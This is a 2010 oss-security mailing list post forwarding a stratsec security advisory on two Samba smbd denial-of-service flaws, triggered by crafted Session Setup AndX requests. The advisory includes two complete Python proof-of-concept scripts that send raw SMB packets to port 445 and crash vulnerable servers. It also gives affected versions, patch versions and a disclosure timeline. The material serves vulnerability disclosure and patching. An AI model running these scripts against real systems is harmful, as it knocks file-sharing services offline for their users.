Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 20 May 2010 16:17:48 +0200
From: Thomas Biege <thomas@...e.de>
To: oss-security@...ts.openwall.com
Cc: "Steven M. Christey" <coley@...us.mitre.org>
Subject: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities

Hello oss-security,
was a CVE-ID assigned for this issue already?

Thanks,
Thomas


----------  Forwarded Message  ----------

Subject: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba 
Multiple DoS Vulnerabilities
Date: Mittwoch 12 Mai 2010, 09:00:07
From: stratsec Advisories <advisories@...atsec.net>
An:  "full-disclosure@...ts.grok.org.uk" <full-disclosure@...ts.grok.org.uk>

===============================================================================
stratsec Security Advisory: SS-2010-005
===============================================================================

Title:           Samba Multiple DoS Vulnerabilities
Version:         1.0
Issue type:      Multiple
Affected vendor: Samba
Release date:    12/05/2010
Discovered by:   Laurent GaffiƩ
Issue status:    Patch available

===============================================================================

Summary
-------

Two vulnerabilities were discovered within in the Samba Smbd daemon which 
allow
an attacker to trigger a null pointer dereference or an uninitialized variable 
read by sending a specific 'Sessions Setup AndX' query. Successful 
exploitation
of these issues will result in a denial of service.

Description
-----------

The Server Message Block (SMB) protocol, also known as Common Internet File 
System (CIFS) acts as an application-layer protocol to provide shared access 
to
files, printers and Inter-Process Communication (IPC). It is also a transport 
for Distributed Computing Environment / Remote Procedure Call (DCE / RPC) 
operations. After negotiating an SMB communication the client sends a 
'Session Setup AndX' packet to negotiate a session in order to be able to 
connect on a specific share.

To trigger the null pointer dereference, the client needs to send a crafted 
SMB
'Negotiate Protocol' query with the SMB header 'Flags2' set to '0x0003' 
(no Unicode), followed by a Session Setup AndX request with the SMB header 
'Flags2' set to '0x8003' (Unicode). This sequence will result in a crash 
within
the Smbd process.
 
The uninitialised Variable Read issue, can be triggered if the client sends a 
crafted 'Session Setup AndX' with a 'security blob length' value set to 
'\xff\xff'.

Impact
------

A remote attacker can cause a denial of service within the Samba daemon 

Affected products
-----------------

Samba <=3.4.7 and Samba <= 3.5.1

Proof of concept
----------------

To trigger the uninitialised variable read issue, the following Python 
proof of concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:	
 sys.exit('Usage: python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\xaa"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x01\xa3"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
"\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host) 
s.send(''.join(packetnego))
s.send(''.join(payload))


To trigger the null pointer dereference issue this Python proof of
concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:	
 sys.exit('python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\x85"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
"\x30\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x00\xec"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
"\xff\xff"  ## Security blob set to \xff\xff here
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)
s = socket(AF_INET, SOCK_STREAM)
s.connect(host) 
s.send(''.join(packetnego))
s.send(''.join(payload))

Solution
--------

Update to version 3.5.2 or 3.4.8 (http://samba.org/) 

Response timeline
-----------------

* 09/03/2010 - Null pointer dereference issue reported to vendor.
* 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours after
               receiving the initial email
* 09/03/2010 - Vendor confirms issue presence, and provide a patch 3
               hours after receiving the initial email. 
* 09/03/2010 - stratsec confirms patch resolves issue.
* 15/03/2010 - Uninitialised Variable Read issue reported to vendor.
* 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours
               after receiving the initial email.
* 15/03/2010 - stratsec confirms patch resolves issue
* 07/04/2010 - Version 3.5.2 released by the vendor fixing both issues.
* 11/05/2010 - Version 3.4.8 released by the vendor fixing both issues.
* 12/05/2010 - This advisory published.

References
----------
* Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html 
* https://bugzilla.samba.org/show_bug.cgi?id=7254
* stratsec would like to thanks the Samba Security Team for their 
  responsiveness while handling theses issues

===============================================================================

About stratsec
--------------
stratsec, specialises in providing information security consulting and testing
services for government and commercial clients. Established in 2004, we are
now one of the leading independent information security companies in the
Australasian and SE-Asian region, with offices throughout Australia and in
Singapore and Malaysia. 

For more information, please visit our website at http://www.stratsec.net/ 

===============================================================================
-- 
Message  protected by MailGuard: e-mail anti-virus, anti-spam and content 
filtering.http://www.mailguard.com.au/mg

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

-----------------------------------------
-- 
 Thomas Biege <thomas@...e.de>, SUSE LINUX, Security Support & Auditing
 SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
--
  Wer aufhoert besser werden zu wollen, hoert auf gut zu sein.
                            -- Marie von Ebner-Eschenbach

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.